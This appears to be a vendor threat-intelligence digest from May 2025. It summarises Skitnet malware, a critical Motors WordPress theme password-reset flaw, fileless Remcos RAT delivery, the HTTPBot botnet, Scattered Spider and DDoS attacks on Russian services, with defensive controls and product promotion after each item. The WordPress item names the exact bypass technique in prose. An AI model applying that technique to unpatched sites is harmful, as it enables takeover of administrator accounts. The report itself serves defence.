Vercara’s Open-Source Intelligence (OSINT) Report – May 16 – May 27, 2025

Ransomware Gangs Increasingly Use Skitnet Post-exploitation Malware 

(TLP: CLEAR) A new malware strain called Skitnet (also known as “Bossnet”) has seen a rise in usage among ransomware gangs in 2025, particularly during post-exploitation phases. First sold on underground forums like RAMP in April 2024, Skitnet has since been used in operations by groups such as BlackBasta and Cactus, including in Microsoft Teams phishing attacks. Skitnet consists of a Rust-based loader that decrypts and loads a Nim binary payload in memory. It communicates with its command-and-control (C2) server through DNS-based reverse shells, allowing it to operate stealthily. Commands are issued via HTTP or DNS through a custom admin panel and include functionalities such as establishing persistence, capturing screenshots, installing remote access tools like AnyDesk and RUT-Serv, launching a PowerShell shell loop, and enumerating antivirus software. The malware also supports a .NET loader for running PowerShell scripts in memory, enabling further flexibility and evasion. Due to its robust features, stealth, and ease of deployment, Skitnet is becoming a favored tool, especially for ransomware groups that lack the resources to develop custom malware. Its off-the-shelf nature also complicates attribution. Prodaft has released Indicators of Compromise (IoCs) for Skitnet on its GitHub for defensive efforts. 

(TLP: CLEAR) Comments: Skitnet, also known as “Bossnet,” is a newly adopted malware tool that has gained traction among prominent ransomware gangs, notably BlackBasta and Cactus, since early 2025. BlackBasta, a ransomware-as-a-service (RaaS) operation active since 2022, is known for targeting enterprise networks with double extortion tactics. Cactus, a more recent yet highly active threat actor, has focused on stealthy, targeted attacks using encryption to bypass detection. Both groups have leveraged Skitnet in post-exploitation stages, with observed use in Microsoft Teams phishing campaigns and other targeted intrusions. Skitnet’s appeal lies in its stealth and modularity. Infection begins with a Rust-based loader that decrypts and executes a Nim binary, which sets up a DNS-based reverse shell for covert command-and-control (C2) communication. The malware supports multiple capabilities, including persistence via DLL hijacking, screen capture, remote access tool deployment (AnyDesk, RUT-Serv), antivirus enumeration, and in-memory PowerShell execution via a .NET loader. These features enable ransomware operators to maintain long-term access and conduct detailed reconnaissance with minimal detection. Unlike custom-built tools, Skitnet offers a ready-made solution that lowers development overhead and complicates attribution due to its broad availability on underground forums like RAMP. This approach appeals to both advanced and lower-tier threat actors, offering a balance between operational efficiency and evasion. Prodaft researchers have published indicators of compromise (IoCs) for Skitnet, underscoring the need for heightened detection and response capabilities as its adoption spreads across the threat landscape. 

(TLP: CLEAR) Recommended best practices/regulations: NIST SP 800-53 Rev5 SI-3: “MALICIOUS CODE PROTECTION   

Control:   

• Implement [Selection (one or more): signature based; non-signature based] malicious code protection mechanisms at system entry and exit points to detect and eradicate malicious code.   
• Automatically update malicious code protection mechanisms as new releases are available in accordance with organizational configuration management policy and procedures.   
• Configure malicious code protection mechanisms to: 1. Perform periodic scans of the system [Assignment: organization-defined frequency] and real-time scans of files from external sources at [Selection (one or more): endpoint; network entry and exit points] as the files are downloaded, opened, or executed in accordance with organizational policy; and 2. [Selection (one or more): block malicious code; quarantine malicious code; take [Assignment: organization-defined action]]; and send alert to [Assignment: organization defined personnel or roles] in response to malicious code detection.  
• Address the receipt of false positives during malicious code detection and eradication and the resulting potential impact on the availability of the system.  

NIST requires malware detection and prevention solutions. This can be on the device, as with anti-virus agents, but also can be augmented by Protective DNS provided by the network that the device is on or across the Internet. This provides defense-in-depth and support for devices such as Internet of Things (IoT) or some servers that cannot run an endpoint client.  

(TLP: CLEAR) Vercara: Vercara’s Protective DNS solution, UltraDDR (DNS Detection and Response), can detect and block malware delivery and command and control (C2) techniques such as phishing, domain generation algorithms, and DNS tunneling to reduce both the quantity and impact of infections.  
Source: https://www.bleepingcomputer.com/news/security/ransomware-gangs-increasingly-use-skitnet-post-exploitation-malware/ 

WordPress Plugin Vulnerability Exposes 22,000 Sites to Cyber Attacks 

(TLP: CLEAR) A critical vulnerability, tracked as CVE-2025-4322, has been discovered in the widely used Motors WordPress theme, putting approximately 22,000 websites at serious risk. The flaw, rated with a CVSS score of 9.8, enables unauthenticated attackers to reset passwords for any user on a vulnerable site, including administrative accounts. This privilege escalation vulnerability arises from improper validation in the password recovery functionality, specifically within the password-recovery.php template file. Attackers can exploit this flaw by manipulating the hash_check parameter, using invalid UTF-8 characters to bypass the security check and gain unauthorized access. Once administrative control is obtained, malicious actors can upload backdoored plugins, modify site content, inject malware or spam, and access sensitive user data. This vulnerability, responsibly disclosed by security researcher Friderika Baranyai (“Foxyyy”) via the Wordfence Bug Bounty Program, exemplifies the broader trend of increasing WordPress security threats, with a reported 68% rise in disclosed vulnerabilities from 2023 to 2024. Site administrators are urged to upgrade to version 5.6.68 or later, released by StylemixThemes on May 14, 2025. Interim protection is available through Wordfence’s firewall, with premium users receiving early defense. This incident highlights the necessity of timely updates and layered security measures to mitigate exploitation risks, especially within the dynamic WordPress ecosystem where themes and plugins often present soft targets for malicious actors. 

(TLP: CLEAR) Comments: The recently disclosed CVE-2025-4322 vulnerability in the Motors WordPress theme poses a significant threat to approximately 22,000 websites. This critical flaw, rated 9.8 on the CVSS scale, allows unauthenticated attackers to reset passwords for any user, including administrators, without authorization. The vulnerability stems from inadequate validation within the password recovery mechanism of the theme’s password-recovery.php file. Specifically, the absence of proper checks on the hash_check parameter—combined with the unintended stripping of invalid UTF-8 characters by the esc_attr() function—permits attackers to bypass intended security controls and escalate privileges. Malicious actors are likely to exploit this vulnerability due to its ease of execution and the high-value access it grants. By gaining administrative control, an attacker can upload malicious plugins or backdoors, inject spam content or malware, steal sensitive data, or redirect visitors to malicious domains. For threat actors engaging in large-scale exploitation, the low barrier to entry and widespread use of the Motors theme make it an ideal target for automated campaigns aimed at compromising vulnerable websites. This case underscores the importance of regular theme and plugin updates, especially in widely deployed platforms like WordPress. It also highlights the need for layered defenses, such as web application firewalls and continuous monitoring. Website administrators are strongly urged to update to version 5.6.68 or later and to implement temporary mitigations if immediate patching is not possible, as unpatched instances remain attractive targets for malicious actors seeking to expand access or establish persistence. 

(TLP: CLEAR) Recommended best practices/regulations: OWASP Web Application Firewall: “A ‘web application firewall (WAF)’ is an application firewall for HTTP applications. It applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. “While proxies generally protect clients, WAFs protect servers. A WAF is deployed to protect a specific web application or set of web applications. A WAF can be considered a reverse proxy. “WAFs may come in the form of an appliance, server plugin, or filter, and may be customized to an application. The effort to perform this customization can be significant and needs to be maintained as the application is modified.”  

(TLP: CLEAR) Vercara: Vercara’s Web Application Firewall, UltraWAF, equips your company with adaptable security features to counteract the most significant network and application-layer threats, including SQL injection, XSS, and DDoS attacks. Its always-on security posture, combined with cloud-based scalability, ensures comprehensive protection against the OWASP top 10, advanced bot management, and vulnerability scanning, allowing you to effectively shield your critical and customer-facing applications from emerging threats.  
Source: https://cybersecuritynews.com/wordpress-plugin-vulnerability-2/ 

Hackers Actively Exploiting PowerShell to Evade Antivirus & EDR 

(TLP: CLEAR) Cybersecurity experts have observed an alarming rise in fileless malware attacks, with threat actors increasingly using advanced techniques to evade traditional security measures. A recent example involves a sophisticated PowerShell-based shellcode loader that deploys the Remcos Remote Access Trojan (RAT) entirely in memory, avoiding detection by signature-based antivirus tools. The attack typically starts with malicious ZIP archives containing weaponized LNK files disguised as benign documents, which when executed, initiate a stealthy infection chain exploiting trusted Windows system binaries. This method enables persistence through registry modifications and bypasses User Account Control (UAC) to gain elevated privileges, all while leaving minimal forensic traces on disk. The infection flow involves downloading an HTA file from command and control servers, which then triggers PowerShell to run the final payload directly in memory. Qualys researchers emphasize the malware’s sophisticated obfuscation techniques—such as encrypted scripts and dynamic API calls—that complicate automated detection and analysis. Remcos RAT provides attackers with extensive capabilities, including screen capture, keylogging, credential theft, and data exfiltration, enabling prolonged, stealthy access to compromised systems. Security experts recommend enhancing PowerShell logging, leveraging the Antimalware Scan Interface (AMSI), and deploying behavior-based Endpoint Detection and Response (EDR) solutions to detect such fileless threats early. This emerging trend highlights the growing need for security teams to move beyond traditional signature-based defenses and adopt more proactive, behavior-focused detection strategies. 

(TLP: CLEAR) Comments: alicious actors could leverage the fileless PowerShell-based loader delivering Remcos RAT to maintain covert, persistent access within compromised systems. By executing code entirely in memory and abusing trusted Windows processes such as MSHTA and PowerShell, attackers evade traditional signature-based security tools, enabling long-term stealth. The initial infection via weaponized LNK files disguised as legitimate documents increases the chances of successful user interaction. Once inside, attackers bypass User Account Control to gain elevated privileges, allowing them to manipulate system settings, disable defenses, and deploy further payloads. Persistence is ensured by modifying registry run keys, allowing the malware to survive reboots undetected. This approach facilitates key malicious activities like credential theft, keylogging, and data exfiltration, providing attackers extensive control. Such fileless techniques are favored by advanced threat actors aiming for stealth and persistence, complicating detection and remediation efforts for security teams, and increasing the overall risk to targeted organizations. 

(TLP: CLEAR) Recommended best practices/regulations: NIST Cybersecurity Framework (CSF) PR.PS-05: “Installation and execution of unauthorized software are prevented”. By enforcing a content filtering policy to block typical software download sites in addition to hacker tools and P2P services, organizations reduce the amount of malware and trojan horses that are introduced into their organization unknowingly by their users.  This can be done via a protective DNS or forward web proxy solution with website categories feeds.  

(TLP: CLEAR) Vercara: Vercara’s Protective DNS solution, UltraDDR (DNS Detection and Response), uses a multi-petabyte data lake filled with DNS query history and indicators of compromise from multiple Cyber Threat Intelligence (CTI) data feeds to correlate an incoming DNS query in real-time with previously observed malicious activity. This ensures that users and devices only go to safe, policy-compliant Internet locations.  
Source: https://cybersecuritynews.com/hackers-actively-exploiting-powershell/ 

New HTTPBot Botnet Launches 200+ Precision DDoS Attacks on Gaming and Tech Sectors 

(TLP: CLEAR) The article highlights the emergence of a new botnet malware called HTTPBot, which primarily targets the gaming industry, technology companies, and educational institutions in China. First detected in August 2024, HTTPBot is distinctive for targeting Windows systems and launching highly targeted Distributed Denial-of-Service (DDoS) attacks using HTTP protocols. Unlike traditional DDoS attacks that rely on overwhelming traffic volume, HTTPBot employs precise, high-fidelity techniques to disrupt critical business functions such as game login and payment systems. HTTPBot achieves stealth by hiding its graphical user interface and manipulating the Windows Registry to persist across reboots. It connects to command-and-control servers to receive instructions for executing various sophisticated attack modules, including simulating legitimate browser traffic and exploiting HTTP/2 and WebSocket protocols to exhaust server resources. Its advanced obfuscation and session simulation techniques enable it to bypass conventional security measures that depend on protocol integrity. This botnet represents a shift in DDoS tactics, moving toward “high-precision business strangulation” to specifically disrupt real-time, business-critical services on Windows platforms, posing a significant risk to targeted industries in China. 

(TLP: CLEAR) Comments: The emergence of HTTPBot represents a significant evolution in botnet capabilities, combining sophisticated attack techniques with precise targeting of high-value services. While currently documented to focus on industries in China—namely gaming, technology, education, and tourism sectors—there is substantial potential for this botnet to expand geographically and affect other regions worldwide. Its modular architecture, which supports diverse HTTP-based attack methods such as BrowserAttack, HttpAutoAttack, and WebSocketAttack, offers considerable flexibility to adapt to different target environments and evade detection. HTTPBot’s capability to simulate legitimate browser traffic and exploit multiple protocols (including HTTP/2 and WebSocket) indicates a highly advanced design aimed at bypassing conventional security defenses reliant on traffic volume or protocol integrity checks. By targeting Windows platforms, which remain widely used in corporate and enterprise environments globally, HTTPBot could disrupt critical online services beyond China, particularly in industries dependent on real-time interactions, such as online gaming, e-commerce, and financial services. The botnet’s use of registry persistence, GUI concealment, and command-and-control communication enhances its stealth and resilience, making it a potent tool for threat actors seeking to conduct sustained, precise DDoS campaigns. As such, organizations worldwide should proactively monitor for behaviors indicative of HTTPBot activity and reinforce defenses against application-layer and session-based DDoS attacks to mitigate this emerging threat. 

(TLP: CLEAR) Recommended best practices/regulations: Critical Infrastructure and Security Agency (CISA), FBI, and Multi-State ISAC publication “Understanding and Responding to Distributed Denial-of-Service Attacks”: “Develop an organization DDoS response plan. The response plan should guide your organization through identifying, mitigating, and rapidly recovering from DDoS attacks. All internal stakeholders—including your organization’s leaders and network defenders—and service providers should understand their roles and responsibilities through all stages of a DDoS attack. At a minimum, the plan should include understanding the nature of a DDoS attack, confirming a DDoS attack, deploying mitigations, monitoring and recovery.  

(TLP: CLEAR) Vercara: Vercara UltraDDoS Protect is a purpose-built DDoS mitigation solution that offers comprehensive protection through on-premises hardware, cloud-based DDoS mitigation, or hybrid approaches. Tailored to meet any organizational need, Vercara’s array of DDoS Protection services include blocking DDoS attacks, redirecting DDoS attacks, and cloud DDoS prevention, ensuring the broadest and most adaptable DDoS defense services available.  
Source: https://thehackernews.com/2025/05/new-httpbot-botnet-launches-200.html 

Shields Up US Retailers. Scattered Spider Threat Actors Can Target Them 

(TLP: CLEAR) The financially motivated cybercrime group UNC3944, also known as Scattered Spider or 0ktapus, has been active in social engineering and extortion, targeting hundreds of organizations over the past two years, including major companies like Twilio, LastPass, DoorDash, and Mailchimp. Originally focusing on telecom companies for SIM swap fraud, the group expanded its operations by 2023 to include ransomware attacks and broader industry sectors. Despite a decline in activity following arrests in 2024, UNC3944 is believed to maintain connections with other threat actors, potentially enabling a resurgence. Recently, the group shifted attention from UK retailers—where ransomware attacks involving DragonForce ransomware were observed—to U.S. companies. Retailers are attractive targets due to their large repositories of personally identifiable information (PII) and financial data, as well as their vulnerability to ransom demands that disrupt financial transaction processing. UNC3944’s tactics include exploiting help desks and outsourced IT services through social engineering to achieve high-impact breaches. Their primary targets span sectors such as technology, telecom, finance, business process outsourcing, gaming, retail, and media, focusing largely on large enterprises in English-speaking countries, India, and Singapore. This evolving strategy underscores the group’s adaptability and ongoing threat to diverse industries worldwide. 

(TLP: CLEAR) Comments: UNC3944, also known as Scattered Spider or 0ktapus, is a financially motivated cybercrime group specializing in social engineering and extortion. Initially focused on telecom companies via SIM swap attacks, the group has expanded to ransomware and broader sectors, targeting high-value industries such as technology, finance, retail, and media. Their tactics rely heavily on exploiting human vulnerabilities, particularly through help desks and outsourced IT support, enabling high-impact breaches. The group is linked to DragonForce ransomware and possibly the RansomHub RaaS platform, indicating their use of ransomware-as-a-service models for scalable attacks. UNC3944 targets large enterprises primarily in English-speaking countries, India, and Singapore, reflecting a strategic focus on organizations with valuable data, including personally identifiable information (PII) and financial records. Their recent shift from UK retailers to U.S. companies demonstrates geographic flexibility and opportunism. UNC3944’s evolving tactics emphasize the importance of robust security awareness, especially around social engineering and insider threat mitigation, to defend against this persistent and adaptable threat actor. 

(TLP: CLEAR) Recommended best practices/regulations: PCI-DSS V4.0 Section 5.2: “An anti-malware solution(s) is deployed on all system components, except for those system components identified in periodic evaluations per Requirement 5.2.3 that concludes the system components are not at risk from malware.” Using a combination of agent-based and network-based detection, such as with a Protective DNS Solution, provides overlapping protection for conventional IT assets such as laptops, desktops, and some servers but also for non-standard IT assets such as IoT devices and some servers that cannot run anti-malware software.  

(TLP: CLEAR) Vercara: Vercara’s Protective DNS solution, UltraDDR (DNS Detection and Response), supports 4 distinct detection engines to provide Defense in Depth against malware and phishing and other abuses:  

• The Lists Engine allows UltraDDR customers the ability to bring their own block lists and allow lists for FQDNs, domains, IP addresses, CIDR blocks, and registrars.  
• The Categories Engine uses Vercara-provided Cyber Threat Intelligence feeds in 17 categories. Administrators can enable blocking on a category with just one button click.  
• The Decision Engine uses a multi-petabyte adversarial infrastructure data lake and artificial intelligence techniques to determine if a previously unseen or recently changed domain is malicious in nature.  
• The Ruleset Engine allows administrators the ability to build custom rules to augment and extend the other engines of UltraDDR.  

Source: https://securityaffairs.com/177974/cyber-crime/shields-up-us-retailers-scattered-spider-threat-actors.html 

Major Russian State Services Disrupted, Reportedly Due to Cyberattack 

(TLP: CLEAR) Several major Russian state services experienced disruptions due to a reported large-scale distributed denial-of-service (DDoS) attack originating from abroad. Affected services include Russia’s tax service (FNS), secure digital key management (Goskey), and document management platform (Saby), with ongoing efforts to restore access. Additionally, Russian businesses reported outages in government services regulating alcohol distribution and product counterfeiting controls. These incidents follow a recent wave of outages affecting Russian banking apps, social media platforms like VKontakte, messaging services, and telecommunications networks. While no group has claimed responsibility for the latest attacks, similar disruptions have previously been linked to Ukraine-affiliated hacktivists such as the IT Army and pro-Ukraine group 4B1D, which reportedly targeted a private hospital’s patient record systems. Notably, these cyberattacks often coincide with significant political events. The recent disruptions occurred shortly after a phone call between U.S. President Trump and Russian President Putin discussing a potential ceasefire in Ukraine, though the connection remains unconfirmed. 

(TLP: CLEAR) Comments: The recent large-scale DDoS attacks on critical Russian state services underscore the increasing cyber dimension of the ongoing Russia-Ukraine conflict. These disruptions target key government infrastructure such as tax services, secure digital key management, and document control systems, signaling a strategic intent to degrade Russia’s administrative capabilities and create operational friction. The attacks appear consistent with previous cyber offensives attributed to Ukraine-linked hacktivist groups, including the IT Army and 4B1D, which have repeatedly targeted Russian networks and critical services since the onset of hostilities. Such cyber operations reflect a broader pattern of asymmetric warfare, where non-traditional tactics like cyberattacks serve to exert pressure on state institutions without direct military engagement. The timing of the attacks—shortly after diplomatic communications between Russian and U.S. leadership regarding a potential ceasefire—could indicate an effort to influence political negotiations or destabilize Russia’s internal systems during a sensitive period. Regionally, this cyber conflict exacerbates existing tensions and highlights the growing reliance on digital disruption as a tool in hybrid warfare, complicating Russia’s ability to maintain normal state functions and signaling an escalation in cyber hostilities within the ongoing geopolitical struggle. 

(TLP: CLEAR) Recommended best practices/regulations: NIST Cybersecurity Framework (CSF) PR.IR-04: “Adequate resource capacity to ensure availability is maintained.” Businesses, particularly those located within NATO and allies, should maintain constant vigilance and regularly test and enhance their cybersecurity defensive capabilities, specifically DDoS mitigation strategies, architecture, monitoring, and procedures.  

(TLP: CLEAR) Vercara: Vercara UltraDDoS Protect can detect DDoS attacks and scrub your internet traffic through countermeasures, processes, and practices that are built upon more than 20 years of expertise in thwarting threats, delivered through a carrier-grade global infrastructure that has been engineered to provide the highest standards of availability, reliability, and scale.  
Source: https://therecord.media/major-russian-state-services-disrupted-ddos